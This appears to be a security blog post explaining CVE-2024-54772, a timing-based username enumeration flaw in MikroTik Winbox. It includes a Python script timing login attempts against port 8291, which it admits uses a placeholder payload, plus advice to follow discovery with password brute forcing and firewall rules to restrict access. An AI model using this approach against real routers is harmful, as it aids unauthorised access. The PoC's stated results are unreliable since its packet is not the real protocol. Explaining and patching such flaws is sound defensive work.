CVE-2024-54772 - How MikroTik RouterOS Winbox Leaks Valid Usernames with Timing Attacks

If you use MikroTik routers and depend on the Winbox service for management, there’s a new vulnerability you need to know about: CVE-2024-54772. This is not your typical “get in and own the box” bug, but don’t underestimate it — it exposes which usernames actually exist on your devices. That’s the first step for lots of bad actors. Let’s break down exactly how it works, how you could test (and fix) it, and why it matters.

What’s the Problem?

Between versions RouterOS v6.43 up through the latest v7.16.1, MikroTik’s Winbox has a subtle issue: when someone tries signing in, the response time is noticeably different if they use a valid username versus an invalid one. Good usernames prompt the system to check a password, which takes longer. Invalid ones fail faster, since the system doesn’t even try the password.

A clever attacker can use these timing differences to automate user account discovery. Best practice says, “don’t confirm or deny whether a username exists,” so this is a clear information leak.

Why Does It Matter?

Once a hacker knows which usernames are valid, brute forcing (guessing passwords) gets much easier. It’s a critical first step in most password-based attacks — if you know which accounts to target, you can focus all your efforts and avoid triggering useless alerts with bogus names.

On an invalid username, Winbox says "nope" almost instantly.

An attacker automates login attempts, measures response times, and maps out valid usernames by charting which responses take longer.

Proof of Concept (PoC)

Here’s a simplified Python script to demonstrate how easy it is to spot a valid username with Winbox:

import socket
import time

WINBOX_HOST = '192.168.88.1'
WINBOX_PORT = 8291

def try_login(username):
    # This simulates a minimal Winbox login packet; real exploit will use actual binary protocol
    # WARNING: This is just a placeholder
    payload = b'\x01\x00' + username.encode()
    s = socket.socket()
    s.settimeout(2.)
    t = time.time()
    try:
        s.connect((WINBOX_HOST, WINBOX_PORT))
        s.send(payload)
        s.recv(64)
    except Exception:
        pass
    s.close()
    return time.time() - t

usernames = ['admin', 'user', 'backup', 'hacker123', 'guest']
for u in usernames:
    t = try_login(u)
    print(f'Username: {u:<10} response time: {t:.3f} s')

If you run it, you’ll notice one or two usernames always take longer to respond than others. Those are your valid users.

The Real Exploit

Security researchers (MikroTik forum post, Security advisory) used scanner frameworks to automate this. You could weaponize this — for mass username discovery — then use another tool to brute force passwords only for those accounts.

Official References

- CVE-2024-54772 @ NIST
- MikroTik Official Documentation
- Security community’s analysis

Example firewall rule to only allow Winbox from 192.168.88.2 (your local admin PC)

/ip firewall filter
add chain=input protocol=tcp dst-port=8291 src-address=192.168.88.2 action=accept
add chain=input protocol=tcp dst-port=8291 action=drop

Conclusion

CVE-2024-54772 may sound harmless compared to bugs that get root access, but it’s a typical “step one” in a real attack chain. MicroTik users should lockdown management services, monitor for weird login attempts, and be ready to update as soon as a fix comes out.

Share this post so other MikroTik admins can stay ahead of attackers!

*If you want hands-on scripts for real scanning or to test your gear, check open source projects you trust — and as always, only test what you own!*

Timeline

Published on: 02/11/2025 23:15:09 UTC
Last modified on: 02/12/2025 22:15:40 UTC